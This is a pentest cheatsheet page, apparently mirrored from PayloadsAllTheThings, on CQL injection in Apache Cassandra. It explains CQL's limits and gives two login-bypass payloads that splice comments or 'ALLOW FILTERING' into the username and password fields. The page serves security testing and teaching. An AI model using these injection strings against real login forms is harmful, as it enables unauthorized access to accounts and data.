daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cassandra-injection.md (2397B)


      1 ---
      2 title: "Cassandra Injection"
      3 topic: "SQL Injection"
      4 topicSlug: "sql-injection"
      5 sourcePath: "SQL Injection/Cassandra Injection.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/SQL%20Injection/Cassandra%20Injection.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Cassandra Injection
     12 
     13 > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
     14 
     15 ## Summary
     16 
     17 * [CQL Injection Limitations](#cql-injection-limitations)
     18 * [Cassandra Comment](#cassandra-comment)
     19 * [Cassandra Login Bypass](#cassandra-login-bypass)
     20     * [Example #1](#example-1)
     21     * [Example #2](#example-2)
     22 * [References](#references)
     23 
     24 ## CQL Injection Limitations
     25 
     26 * Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
     27 
     28 * Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
     29 
     30 * Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
     31 
     32 * Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function.
     33 
     34 * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
     35 
     36 ## Cassandra Comment
     37 
     38 ```sql
     39 /* Cassandra Comment */
     40 ```
     41 
     42 ## Cassandra Login Bypass
     43 
     44 ### Example #1
     45 
     46 ```sql
     47 username: admin' ALLOW FILTERING; %00
     48 password: ANY
     49 ```
     50 
     51 ### Example #2
     52 
     53 ```sql
     54 username: admin'/*
     55 password: */and pass>'
     56 ```
     57 
     58 The injection would look like the following SQL query
     59 
     60 ```sql
     61 SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
     62 ```
     63 
     64 ## References
     65 
     66 * [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://web.archive.org/web/20230130053010/https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
     67 * [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://web.archive.org/web/20251213065510/https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra)